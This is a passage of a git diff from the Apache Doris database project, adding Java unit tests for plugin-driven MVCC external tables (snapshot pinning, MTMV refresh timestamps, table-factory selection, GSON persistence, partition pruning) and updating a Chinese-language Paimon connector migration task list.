f.table.getNewestUpdateVersionOrTime(); + }); + + // MUTATION: returning min instead of max makes this red. MUTATION: reading the CONTEXT pin + // instead of re-listing would return Long.MAX_VALUE (the pinned max), not the fresh-listing max + // — proving the pin is bypassed. + Assertions.assertEquals(TS_2024_02_02, newest[0], + "must return max(lastModifiedMillis) from a fresh LATEST listing, NOT the context pin's max"); + // MUTATION: reading a context pin instead of re-listing would skip this call (zero + // interactions), making the verify red. Proves the pin is bypassed. + Mockito.verify(f.metadata).listPartitions(Mockito.any(), Mockito.any(), Mockito.any()); + } + + @Test + public void testGetNewestUpdateVersionOrTimeAllUnknownReturnsZeroNotSentinel() { + // Every partition advertises UNKNOWN(-1) lastModifiedMillis (connector did not collect a + // modified time). Legacy used Paimon's lastFileCreationTime() which has no -1 sentinel and + // reduced to 0 when empty; the bridge must match that, not leak -1 into MTMV staleness. + Fixture f = Fixture.with(Arrays.asList( + cpi("dt=2024-01-01", ConnectorPartitionInfo.UNKNOWN), + cpi("dt=2024-02-02", ConnectorPartitionInfo.UNKNOWN))); + // MUTATION: without the `filter(v -> v >= 0)`, max() over {-1,-1} returns -1, not 0 -> red. + Assertions.assertEquals(0L, f.table.getNewestUpdateVersionOrTime(), + "an all-UNKNOWN table must reduce to the legacy 0, never the -1 sentinel"); + } + + @Test + public void testGetNewestUpdateVersionOrTimeIgnoresUnknownAmongReal() throws AnalysisException { + // A mix of a real modified time and an UNKNOWN(-1) sentinel: the sentinel must be ignored so + // the max is the REAL value, not -1 (and not skewed by -1 participating in the reduction). + Fixture f = Fixture.with(Arrays.asList( + cpi("dt=2024-01-01", ConnectorPartitionInfo.UNKNOWN), + cpi("dt=2024-02-02", TS_2024_02_02))); + // MUTATION: the real value already wins over -1 in a plain max(), so this is a weak guard on + // its own; the all-UNKNOWN==0 test above is the primary sentinel-leak catcher. + Assertions.assertEquals(TS_2024_02_02, f.table.getNewestUpdateVersionOrTime(), + "the UNKNOWN sentinel must be filtered, leaving the max of the REAL values"); + } + + @Test + public void testIsPartitionColumnAllowNullTrue() { + Assertions.assertTrue(Fixture.partitioned().table.isPartitionColumnAllowNull()); + } + + // ==================== fixtures / helpers ==================== + + private static ConnectorPartitionInfo cpi(String name, long lastModifiedMillis) { + return new ConnectorPartitionInfo(name, Collections.emptyMap(), Collections.emptyMap(), + ConnectorPartitionInfo.UNKNOWN, ConnectorPartitionInfo.UNKNOWN, lastModifiedMillis); + } + + /** + * Runs {@code body} with {@code snapshot} pinned for {@code table} in a thread-local + * {@link ConnectContext}'s {@link StatementContext}, then clears the thread-local. + */ + private static void withContextSnapshot(PluginDrivenMvccExternalTable table, + MvccSnapshot snapshot, Runnable body) { + ConnectContext ctx = new ConnectContext(); + StatementContext stmtCtx = new StatementContext(ctx, null); + ctx.setStatementContext(stmtCtx); + ctx.setThreadLocalInfo(); + try { + stmtCtx.setSnapshot(new MvccTableInfo(table), snapshot); + body.run(); + } finally { + ConnectContext.remove(); + } + } + + /** + * Wires a {@link PluginDrivenMvccExternalTable} over a mocked connector/metadata, stubbing the + * LATEST schema cache so {@code getPartitionColumns()} returns a single DATE column {@code dt}. + * The {@code timeTravel()} variant additionally stubs the time-travel SPI methods so + * {@code loadSnapshot} with an explicit spec resolves to a known snapshot + at-snapshot schema. + */ + private static final class Fixture { + static final long TT_SCHEMA_ID = 9L; + + final PluginDrivenMvccExternalTable table; + final ConnectorMetadata metadata; + final ConnectorTableHandle handle; + final ConnectorTableHandle pinnedHandle; + final ConnectorSession session; + final PluginDrivenSchemaCacheValue latestCacheValue; + final ConnectorMvccSnapshot resolvedSnapshot; + + private Fixture(PluginDrivenMvccExternalTable table, ConnectorMetadata metadata, + ConnectorTableHandle handle, ConnectorTableHandle pinnedHandle, ConnectorSession session, + PluginDrivenSchemaCacheValue latestCacheValue, ConnectorMvccSnapshot resolvedSnapshot) { + this.table = table; + this.metadata = metadata; + this.handle = handle; + this.pinnedHandle = pinnedHandle; + this.session = session; + this.latestCacheValue = latestCacheValue; + this.resolvedSnapshot = resolvedSnapshot; + } + + /** Captures the {@link ConnectorTimeTravelSpec} passed to {@code resolveTimeTravel}. */ + ConnectorTimeTravelSpec captureSpec() { + ArgumentCaptor captor = + ArgumentCaptor.forClass(ConnectorTimeTravelSpec.class); + Mockito.verify(metadata).resolveTimeTravel(Mockito.any(), Mockito.any(), captor.capture()); + return captor.getValue(); + } + + static Fixture partitioned() { + return with(Arrays.asList( + cpi("dt=2024-01-01", TS_2024_01_01), + cpi("dt=2024-02-02", TS_2024_02_02))); + } + + static Fixture with(List partitions) { + return build(partitions, false); + } + + /** Adds time-travel SPI stubs on top of the base fixture. */ + static Fixture timeTravel() { + return build(Arrays.asList( + cpi("dt=2024-01-01", TS_2024_01_01), + cpi("dt=2024-02-02", TS_2024_02_02)), true); + } + + /** + * Base fixture but with {@code getTableHandle(...)} re-stubbed to {@link Optional#empty()}, + * exercising the no-handle degrade (materializeLatest empty-pin) and the time-travel no-handle + * guard (loadSnapshot throwing). + */ + static Fixture noHandle() { + Fixture f = partitioned(); + Mockito.when(f.metadata.getTableHandle(f.session, "REMOTE_DB", "REMOTE_TBL")) + .thenReturn(Optional.empty()); + return f; + } + + private static Fixture build(List partitions, boolean timeTravel) { + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + ConnectorSession session = Mockito.mock(ConnectorSession.class); + ConnectorTableHandle handle = Mockito.mock(ConnectorTableHandle.class); + ConnectorTableHandle pinnedHandle = Mockito.mock(ConnectorTableHandle.class); + TestablePluginCatalog catalog = new TestablePluginCatalog(metadata, session); + ExternalDatabase db = mockDb("REMOTE_DB"); + + Mockito.when(metadata.getTableHandle(session, "REMOTE_DB", "REMOTE_TBL")) + .thenReturn(Optional.of(handle)); + Mockito.when(metadata.beginQuerySnapshot(session, handle)) + .thenReturn(Optional.of( + ConnectorMvccSnapshot.builder().snapshotId(PINNED_SNAPSHOT_ID).build())); + Mockito.when(metadata.listPartitions(Mockito.eq(session), Mockito.eq(handle), Mockito.any())) + .thenReturn(partitions); + + // Single DATE partition column "dt" — the LATEST schema. + List schema = Collections.singletonList(new Column("dt", Type.DATEV2)); + PluginDrivenSchemaCacheValue latestCacheValue = new PluginDrivenSchemaCacheValue( + schema, schema, Collections.singletonList("dt")); + + ConnectorMvccSnapshot resolvedSnapshot = ConnectorMvccSnapshot.builder() + .snapshotId(7L).schemaId(TT_SCHEMA_ID).build(); + + if (timeTravel) { + // resolveTimeTravel succeeds; applySnapshot returns the branch-aware pinnedHandle; + // getTableSchema(..,snapshot) returns the AT-SNAPSHOT schema (column "v1"), distinct + // from the latest schema (column "dt"). fromRemoteColumnName is identity. + Mockito.when(metadata.resolveTimeTravel(Mockito.eq(session), Mockito.eq(handle), + Mockito.any())).thenReturn(Optional.of(resolvedSnapshot)); + Mockito.when(metadata.applySnapshot(session, handle, resolvedSnapshot)) + .thenReturn(pinnedHandle); + ConnectorTableSchema atSchema = new ConnectorTableSchema("REMOTE_TBL", + Collections.singletonList(new ConnectorColumn("v1", ConnectorType.of("INT"), + "", true, null)), + "", Collections.emptyMap()); + Mockito.when(metadata.getTableSchema(Mockito.eq(session), Mockito.any(), + Mockito.any(ConnectorMvccSnapshot.class))).thenReturn(atSchema); + Mockito.when(metadata.fromRemoteColumnName(Mockito.eq(session), Mockito.any(), + Mockito.any(), Mockito.anyString())) + .thenAnswer(inv -> inv.getArgument(3, String.class)); + } + + PluginDrivenMvccExternalTable table = + new PluginDrivenMvccExternalTable(1L, "tbl", "REMOTE_TBL", catalog, db) { + @Override + protected synchronized void makeSureInitialized() { + // no-op: skip Env-backed catalog/db init + } + + @Override + protected Optional getLatestSchemaCacheValue() { + // Bypass the live Env-backed schema cache; route the LATEST seam to the + // canned value so the real getSchemaCacheValue() override is exercised. + return Optional.of(latestCacheValue); + } + }; + return new Fixture(table, metadata, handle, pinnedHandle, session, latestCacheValue, + resolvedSnapshot); + } + } + + @SuppressWarnings("unchecked") + private static ExternalDatabase mockDb(String remoteName) { + ExternalDatabase db = Mockito.mock(ExternalDatabase.class); + Mockito.when(db.getRemoteName()).thenReturn(remoteName); + // Needed so MvccTableInfo(table) -> db.getFullName()/db.getCatalog().getName() resolve in the + // context-pin tests. + Mockito.when(db.getFullName()).thenReturn("test_db"); + ExternalCatalog ctl = Mockito.mock(ExternalCatalog.class); + Mockito.when(ctl.getName()).thenReturn("test_catalog"); + Mockito.when(db.getCatalog()).thenReturn(ctl); + return db; + } + + /** + * Minimal catalog returning a fixed connector/session without standing up the Doris + * environment (mirrors PluginDrivenExternalTablePartitionTest.TestablePluginCatalog). + */ + private static final class TestablePluginCatalog extends PluginDrivenExternalCatalog { + private final Connector connector; + private final ConnectorSession session; + + TestablePluginCatalog(ConnectorMetadata metadata, ConnectorSession session) { + this(mockConnector(metadata, session), session); + } + + private TestablePluginCatalog(Connector connector, ConnectorSession session) { + super(1L, "test-catalog", null, makeProps(), "", connector); + this.connector = connector; + this.session = session; + } + + private static Connector mockConnector(ConnectorMetadata metadata, ConnectorSession session) { + Connector c = Mockito.mock(Connector.class); + Mockito.when(c.getMetadata(session)).thenReturn(metadata); + return c; + } + + @Override + public Connector getConnector() { + return connector; + } + + @Override + public ConnectorSession buildConnectorSession() { + return session; + } + + @Override + protected List listDatabaseNames() { + return Collections.emptyList(); + } + + @Override + protected List listTableNamesFromRemote(SessionContext ctx, String dbName) { + return Collections.emptyList(); + } + + @Override + public boolean tableExist(SessionContext ctx, String dbName, String tblName) { + return false; + } + + private static Map makeProps() { + Map props = new HashMap<>(); + props.put("type", "mvcc-test"); + return props; + } + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenMvccTableFactoryTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenMvccTableFactoryTest.java new file mode 100644 index 00000000000000..2c60944fb98c01 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenMvccTableFactoryTest.java @@ -0,0 +1,125 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource; + +import org.apache.doris.catalog.TableIf; +import org.apache.doris.connector.api.Connector; +import org.apache.doris.connector.api.ConnectorCapability; +import org.apache.doris.persist.gson.GsonUtils; + +import com.google.common.collect.Sets; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; +import org.mockito.Mockito; + +import java.util.Collections; + +/** + * Tests for the capability-selected table factory in {@link PluginDrivenExternalDatabase} and the + * GSON registration of {@link PluginDrivenMvccExternalTable}. + * + *

    Why these matter: the factory is the ONLY place a connector's MVCC capability is turned + * into the right table class. If it always built the base class, an MTMV over a Paimon table would + * never see the MvccTable/MTMV hooks (no snapshot pinning, broken incremental refresh); if it always + * built the subclass, plain jdbc/es/max_compute tables would acquire MTMV behavior they do not + * support. The GSON test guards edit-log durability: a persisted MVCC table must deserialize back as + * the SAME subclass, otherwise an FE restart would silently downgrade it to the base table and lose + * the MVCC behavior on replay.

    + */ +public class PluginDrivenMvccTableFactoryTest { + + // ==================== factory: capability selects the subclass ==================== + + @Test + public void testBuildsMvccTableWhenConnectorDeclaresMvccCapability() { + PluginDrivenExternalDatabase db = new PluginDrivenExternalDatabase(); + PluginDrivenExternalCatalog catalog = catalogWithCapabilities( + ConnectorCapability.SUPPORTS_MVCC_SNAPSHOT); + + ExternalTable table = db.buildTableInternal("rt", "lt", 1L, catalog, db); + + // MUTATION: always returning the base class (dropping the capability branch) makes this red. + Assertions.assertTrue(table instanceof PluginDrivenMvccExternalTable, + "an MVCC-capable connector must yield the MVCC/MTMV subclass"); + } + + @Test + public void testBuildsBaseTableWhenConnectorLacksMvccCapability() { + PluginDrivenExternalDatabase db = new PluginDrivenExternalDatabase(); + // jdbc/es/max_compute/trino-connector advertise no MVCC capability. + PluginDrivenExternalCatalog catalog = catalogWithCapabilities( + ConnectorCapability.SUPPORTS_FILTER_PUSHDOWN); + + ExternalTable table = db.buildTableInternal("rt", "lt", 1L, catalog, db); + + // MUTATION: always returning the subclass makes this red — a non-MVCC connector must NOT get + // MTMV behavior. instanceof would still pass on a subclass, so assert the EXACT class. + Assertions.assertSame(PluginDrivenExternalTable.class, table.getClass(), + "a connector without SUPPORTS_MVCC_SNAPSHOT must keep the base PluginDrivenExternalTable"); + } + + @Test + public void testBuildsBaseTableWhenConnectorIsNull() { + PluginDrivenExternalDatabase db = new PluginDrivenExternalDatabase(); + PluginDrivenExternalCatalog catalog = Mockito.mock(PluginDrivenExternalCatalog.class); + Mockito.when(catalog.getConnector()).thenReturn(null); + + ExternalTable table = db.buildTableInternal("rt", "lt", 1L, catalog, db); + + // MUTATION: a missing null-guard (NPE on getCapabilities) makes this red. Lazy-init catalogs + // whose connector is not yet built must fall back to the base class, not crash. + Assertions.assertSame(PluginDrivenExternalTable.class, table.getClass(), + "a not-yet-built connector must degrade to the base table, never NPE"); + } + + // ==================== GSON: MVCC subclass survives a round-trip ==================== + + @Test + public void testMvccTableGsonRoundTripPreservesSubclass() { + PluginDrivenMvccExternalTable table = new PluginDrivenMvccExternalTable(); + // Set only the GSON-serialized fields; catalog/db are not @SerializedName so they are not + // persisted (and need not be set for a pure serialization round-trip). + table.id = 7L; + table.name = "mvcc_tbl"; + table.remoteName = "REMOTE_MVCC_TBL"; + table.dbName = "mvcc_db"; + + // Round-trip through the TableIf hierarchy so the polymorphic "clazz" discriminator is used. + String json = GsonUtils.GSON.toJson(table, TableIf.class); + TableIf restored = GsonUtils.GSON.fromJson(json, TableIf.class); + + // MUTATION: omitting the registerSubtype(PluginDrivenMvccExternalTable) makes serialization + // throw "subtype not registered", failing this test. A wrong registration (e.g. tagging it as + // the base class) would deserialize to PluginDrivenExternalTable and fail the instanceof. + Assertions.assertTrue(restored instanceof PluginDrivenMvccExternalTable, + "a persisted MVCC table must deserialize back as PluginDrivenMvccExternalTable"); + Assertions.assertEquals(7L, restored.getId()); + Assertions.assertEquals("mvcc_tbl", restored.getName()); + } + + // ==================== helpers ==================== + + private static PluginDrivenExternalCatalog catalogWithCapabilities(ConnectorCapability... caps) { + Connector connector = Mockito.mock(Connector.class); + Mockito.when(connector.getCapabilities()).thenReturn( + caps.length == 0 ? Collections.emptySet() : Sets.newHashSet(caps)); + PluginDrivenExternalCatalog catalog = Mockito.mock(PluginDrivenExternalCatalog.class); + Mockito.when(catalog.getConnector()).thenReturn(connector); + return catalog; + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeMvccPinTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeMvccPinTest.java new file mode 100644 index 00000000000000..53a0d6e96579da --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeMvccPinTest.java @@ -0,0 +1,108 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource; + +import org.apache.doris.connector.api.ConnectorMetadata; +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.mvcc.ConnectorMvccSnapshot; +import org.apache.doris.datasource.mvcc.MvccSnapshot; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; +import org.mockito.Mockito; + +import java.util.Collections; +import java.util.Optional; + +/** + * Guards {@link PluginDrivenScanNode#applyMvccSnapshotPin}, the pure pin-vs-skip decision threaded + * onto the table handle before every scan-side consumption (planScan + the serialized-table / + * getScanNodeProperties path). + * + *

    Why this matters: an MVCC-capable connector (paimon today) must read the WHOLE query at + * one pinned point-in-time snapshot — a time-travel ({@code FOR TIME AS OF}) or MTMV-consistent read. + * If the pin is not threaded onto the handle before a consumption point, that path silently reads + * LATEST instead, producing rows from a different snapshot than the rest of the query. The helper + * must (1) apply the pin when a plugin snapshot is present, (2) NOT pin when there is no snapshot + * (read latest, e.g. before the connector is MVCC-cutover or a non-MVCC table), and (3) NOT pin — and + * not ClassCastException — on a foreign (non-plugin) {@link MvccSnapshot}. Each test kills the + * corresponding mutation.

    + */ +public class PluginDrivenScanNodeMvccPinTest { + + @Test + public void pluginSnapshotPresentPinsHandle() { + // MUTATION: a "return input handle unchanged" / "never call applySnapshot" mutation is killed + // here — a present plugin snapshot MUST be unwrapped and threaded onto the handle, else a + // time-travel/MTMV read silently reads LATEST. Distinct input vs pinned mock handles ensure + // the returned value is the connector's pinned handle, not the untouched input. + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + ConnectorSession session = Mockito.mock(ConnectorSession.class); + ConnectorTableHandle inputHandle = Mockito.mock(ConnectorTableHandle.class); + ConnectorTableHandle pinnedHandle = Mockito.mock(ConnectorTableHandle.class); + ConnectorMvccSnapshot connectorSnapshot = Mockito.mock(ConnectorMvccSnapshot.class); + PluginDrivenMvccSnapshot snapshot = new PluginDrivenMvccSnapshot( + connectorSnapshot, Collections.emptyMap(), Collections.emptyMap()); + + Mockito.when(metadata.applySnapshot(session, inputHandle, connectorSnapshot)) + .thenReturn(pinnedHandle); + + ConnectorTableHandle result = PluginDrivenScanNode.applyMvccSnapshotPin( + metadata, session, inputHandle, Optional.of(snapshot)); + + // applySnapshot must be invoked with the UNWRAPPED ConnectorMvccSnapshot (not the wrapper). + Mockito.verify(metadata).applySnapshot(session, inputHandle, connectorSnapshot); + // and the pinned handle the connector returned is what flows downstream to planScan. + Assertions.assertSame(pinnedHandle, result); + } + + @Test + public void emptySnapshotReadsLatestUnchanged() { + // MUTATION: a "pin unconditionally" mutation (dropping the isPresent guard) is killed — with no + // snapshot in context (no MVCC pin, e.g. pre-cutover or a non-MVCC table) the handle must be + // returned UNCHANGED so the scan reads latest, and applySnapshot must NOT be called. + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + ConnectorSession session = Mockito.mock(ConnectorSession.class); + ConnectorTableHandle inputHandle = Mockito.mock(ConnectorTableHandle.class); + + ConnectorTableHandle result = PluginDrivenScanNode.applyMvccSnapshotPin( + metadata, session, inputHandle, Optional.empty()); + + Assertions.assertSame(inputHandle, result); + Mockito.verifyNoInteractions(metadata); + } + + @Test + public void foreignSnapshotReadsLatestUnchanged() { + // MUTATION: dropping the instanceof PluginDrivenMvccSnapshot guard is killed — a foreign + // MvccSnapshot (some other table type's snapshot present in the same statement context) must + // NOT be pinned and must NOT ClassCastException; the handle is returned unchanged (read latest) + // and applySnapshot is never called for a snapshot this node cannot unwrap. + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + ConnectorSession session = Mockito.mock(ConnectorSession.class); + ConnectorTableHandle inputHandle = Mockito.mock(ConnectorTableHandle.class); + MvccSnapshot foreignSnapshot = Mockito.mock(MvccSnapshot.class); + + ConnectorTableHandle result = PluginDrivenScanNode.applyMvccSnapshotPin( + metadata, session, inputHandle, Optional.of(foreignSnapshot)); + + Assertions.assertSame(inputHandle, result); + Mockito.verifyNoInteractions(metadata); + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodePartitionPruningTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodePartitionPruningTest.java index 4b4cec4ecdb0cd..75e48eeb069be6 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodePartitionPruningTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodePartitionPruningTest.java @@ -99,6 +99,7 @@ public void testPrunedToZeroReturnsEmptyNonNullForShortCircuit() { // returns unconditional true precisely so PruneFileScanPartition leaves non-partitioned tables // NOT_PRUNED (see PluginDrivenExternalTablePartitionTest // #testNonPartitionedTableReportsNoPartitionsButStillOptsIntoPruning). + // totalPartitionNum=5 (> 0): a GENUINE prune-to-zero over a non-empty universe. SelectedPartitions emptyPruned = new SelectedPartitions(5, Collections.emptyMap(), true); List result = PluginDrivenScanNode.resolveRequiredPartitions(emptyPruned); @@ -106,4 +107,21 @@ public void testPrunedToZeroReturnsEmptyNonNullForShortCircuit() { Assertions.assertNotNull(result); Assertions.assertTrue(result.isEmpty()); } + + @Test + public void testPrunedEmptyOverEmptyUniverseScansAll() { + // RD-1 (B5b-4): a pruned-but-empty selection whose partition UNIVERSE was ALSO empty + // (totalPartitionNum == 0) is NOT a genuine prune-to-zero. It is an MVCC time-travel pin + // (FOR VERSION/TIME AS OF, @tag, @branch) whose snapshot deliberately carries an empty + // partition-item map and defers partition pruning to the connector's predicate pushdown. + // It must map to null (scan-all) so getSplits() does NOT short-circuit and planScan runs, + // mirroring legacy PaimonScanNode (which ignores selectedPartitions and re-plans via the SDK). + // MUTATION: returning the empty list (like the totalPartitionNum>0 case above) short-circuits + // to zero splits -> silent data loss for partitioned time-travel + a partition predicate, and + // this assertion goes red. + SelectedPartitions emptyUniverse = new SelectedPartitions(0, Collections.emptyMap(), true); + + Assertions.assertNull(PluginDrivenScanNode.resolveRequiredPartitions(emptyUniverse), + "a pruned-empty selection over an empty partition universe (time-travel pin) must scan all"); + } } diff --git a/plan-doc/tasks/P5-paimon-migration.md b/plan-doc/tasks/P5-paimon-migration.md index a620c00cea330e..7377b32ccebb3f 100644 --- a/plan-doc/tasks/P5-paimon-migration.md +++ b/plan-doc/tasks/P5-paimon-migration.md @@ -69,7 +69,7 @@ Master plan [§3.6](../00-connector-migration-master-plan.md);策略 = full ad - [ ] 系统表 `$snapshots/$files/$partitions/$manifests/$schemas/$binlog/$audit_log` SELECT + DESCRIBE 经 SPI 路径正确(binlog/audit_log 强制 JNI 行正确)。 - [ ] DDL:CREATE/DROP TABLE(分区+主键+location)、CREATE/DROP DATABASE(HMS 带 props vs filesystem 拒)、DROP DB FORCE 级联、no-ENGINE CREATE TABLE、重启后 5 flavor GSON tag edit-log replay 绿。 - [ ] **MTMV**(D2 取「实现」时):单分区变更只刷该分区(timestamp staleness)+ 全表 snapshotId 变更刷全表;单-pin 不变式测(读路径与 MTMV 各方法观同一 snapshotId+分区集)。**OR**(D2 取「fail-loud 延后」时):MTMV-base/时间旅行命中 SPI paimon 表显式报错,**禁静默读 latest**。 -- [ ] procedure:`CALL paimon.x` / `ALTER ... EXECUTE` 翻闸后仍报错(no-op 守护);doc 钉死两假阳性。 +- [ ] procedure:`CALL paimon.x` / `ALTER ... EXECUTE` 翻闸后仍报错(no-op 守护);doc 钉死两假阳性。 — **doc 部分 ✅ B6/T26**(两假阳性已钉、seam 已记、0 可迁 firsthand 核实);「翻闸后仍报错」= B7 live-e2e 验。 - [ ] session-TZ 时间戳谓词非 UTC session 不丢行(修 `PaimonPredicateConverter:284`)。 - [ ] FE→BE serialized-Table round-trip smoke(built jars);连接器 paimon-core 版本 == be-java-extensions/paimon-scanner + preload-extensions。 - [ ] 连接器 UT(无 mockito/无 fe-core)+ checkstyle 0 + import-gate 净;删 legacy 后 `grep paimon fe-core/src` 仅 GSON compat 壳。 @@ -103,14 +103,19 @@ Master plan [§3.6](../00-connector-migration-master-plan.md);策略 = full ad | P5-T18 | 通用 fe-core `PluginDrivenSysExternalTable extends PluginDrivenExternalTable`(报 PLUGIN_EXTERNAL_TABLE) + `NativeSysTable` factory;override `PluginDrivenExternalTable.getSupportedSysTables/findSysTable` 委托连接器 | B4 | C | ✅ | 路由经 `PluginDrivenScanNode`,**报 PLUGIN_EXTERNAL_TABLE 非 PAIMON**;`PluginDrivenExternalTable` 集中 handle 获取入 `resolveConnectorTableHandle` seam(4 site),sys 子类 override 之喂 sys handle;`getSupportedSysTables` 委托连接器 `listSupportedSysTables`;sys 表 transient 不持久化/不 GSON 注册 | | P5-T19 | `PaimonScanPlanProvider` 加 forceJni 分支(binlog/audit_log + 非 DataTable sys 全走 JNI)+ 通用节点 fail-loud 拒 sys 表 scan-params/time-travel;核 BE sys-table `TTableDescriptor`(HIVE_TABLE?) | B4 | C | ✅ | binlog/audit_log 走 native = 行错(静默)→ `shouldUseNativeReader(forceJni,...)` gate(ro 仍 native、metadata 表经 non-DataSplit JNI);**核出 BE 描述符**:加 `buildTableDescriptor`→`HIVE_TABLE`(同修普通表 SCHEMA_TABLE fallback 遗留缺陷 [DV-024]);`PluginDrivenScanNode` fail-loud 拒 sys 表 scan-params/time-travel;**最终复审 BLOCKER 已修**:`PluginDrivenScanNode.create` 改走 `resolveConnectorTableHandle` seam(原直调 `getTableHandle` 丢 forceJni)| | P5-T20 | **首个 E5 消费者**:实现 `beginQuerySnapshot/getSnapshotAt/getSnapshotById`(返 `ConnectorMvccSnapshot(snapshotId)`,空表 -1)+声明 `SUPPORTS_MVCC_SNAPSHOT/TIME_TRAVEL`;sys 表不得透出 time-travel | B4 | C | ✅ | **inert until B5**(`PluginDrivenExternalTable` 非 MvccTable、零 fe-core 消费方;翻闸 gated on B5 故安全);snapshot 经新 seam(`latestSnapshotId`/`snapshotIdAtOrBefore`/`snapshotExists`,SDK 在 `CatalogBackedPaimonCatalogOps`、fake 在 Recording);sys handle→`Optional.empty`;**SPI 契约 empty-if-none vs legacy throw**(已 doc,B5 消费方 surface 用户错误);`PaimonConnector.getCapabilities` 声明二 flag | -| P5-T21 | **GAP-LISTPART-AT-SNAPSHOT**:listPartitions 加 at-snapshot 重载(按 pin 的 snapshotId 列分区);连接器实现;默认保 latest 向后兼容 | B5 | C | ⏳ | 单-pin 不变式前提 | -| P5-T22 | fe-core `PaimonPluginDrivenExternalTable extends PluginDrivenExternalTable` implements MTMVRelatedTableIf+MTMVBaseTableIf+MvccTable;`loadSnapshot`(beginQuerySnapshot 定 snapshotId + at-snapshot 物化分区集**一次**)| B5 | C | ⏳ | **gated on D2** | -| P5-T23 | 子类 MTMV 方法:getTableSnapshot(→MTMVSnapshotIdSnapshot,-1)/getPartitionSnapshot(→MTMVTimestampSnapshot,缺抛 AnalysisException)/getAndCopyPartitionItems(读 pin 非重列)/getPartitionType/getPartitionColumnNames/isPartitionColumnAllowNull(true)/beforeMTMVRefresh(no-op)/getNewestUpdateVersionOrTime(**绕 pin**) | B5 | C | ⏳ | | -| P5-T24 | rehome fe-core `PaimonMvccSnapshot`(包 `ConnectorMvccSnapshot` + fe-core 物化 name→PartitionItem/lastModifiedMillis/listed-count);downcast 留 fe-core 内 | B5 | C | ⏳ | | -| P5-T25 | isPartitionInvalid parity(捕 listPartitions count vs 成功构建 PartitionItem count,size 不匹配→UNPARTITIONED 全表刷);MTMV 单-pin 不变式测 + UT | B5 | C+T | ⏳ | | -| P5-T26 | **procedure DOC no-op**:连接器档 E2 改「NOTHING TO PORT」(非「后续」);钉死两假阳性(Spark migrate_table / iceberg expire_snapshots);记未来 seam 位置(`ExecuteActionFactory:59` + 可选 `ConnectorProcedureProvider`);可选负回归(CALL/EXECUTE 仍报错)| B6 | D | ⏳ | 零 code | +| P5-T21 | ~~GAP-LISTPART-AT-SNAPSHOT~~ → **D-041 drop**:仅「list at begin-query pin(MTMV=latest)」= 现有 `catalogOps.listPartitions`;不建 at-snapshot SDK seam(legacy 时间旅行用 EMPTY 分区,超 parity);接受两-SDK-call 微 race(doc 记)| B5a | D | ✅ | D-041;并入 T22 loadSnapshot | +| P5-T22 | **通用** `PluginDrivenMvccExternalTable extends PluginDrivenExternalTable` implements MTMVRelatedTableIf+MTMVBaseTableIf+MvccTable(**源无关 D-042**,NO paimon 类)+ catalog 按 `SUPPORTS_MVCC_SNAPSHOT` capability 选择实例化 + GSON 注册 + 连接器 `getTableSchema` emit `partition_columns`(替 `partition_keys`);`loadSnapshot`(beginQuerySnapshot latest pin + materialize rendered 分区**一次**→通用 MVCC wrapper)| B5a | C | ✅ | **D-042/D-040**;done(双审 PASS) | +| P5-T23 | 通用类 MTMV 方法(全 SPI-delegate):**loadSnapshot**(漏项)/getTableSnapshot **两重载**(→MTMVSnapshotIdSnapshot(**真 pinned snapshotId** 非 -1))/getPartitionSnapshot(→MTMVTimestampSnapshot(lastModifiedMillis),缺抛 AnalysisException)/getAndCopyPartitionItems(**读 pin**)/getPartitionType(**LIST**)/getPartitionColumnNames(**lowercase**)/getPartitionColumns(Optional)(**已 base 继承**)/isPartitionColumnAllowNull(true)/beforeMTMVRefresh(no-op)/getNewestUpdateVersionOrTime(**绕 pin** latest max lastModifiedMillis) | B5a | C | ✅ | recon 纠偏②见 D-040~042 节 | +| P5-T24 | 通用 fe-core MVCC snapshot wrapper(包 `ConnectorMvccSnapshot` + 物化 `nameToPartitionItem`/`nameToLastModifiedMillis`/`listedCount`);downcast 留 fe-core 内;**剔除 `PaimonPartition`**($partitions sys 行 decoy 未用)| B5a | C | ✅ | recon 纠偏⑦;holistic cleanup 删 `listedCount`,`isPartitionInvalid` 改两 name-keyed map 比对(exact legacy parity,修 dup-rendered-name 假 UNPARTITIONED) | +| P5-T25 | `isPartitionInvalid` parity = **port legacy per-partition try/catch 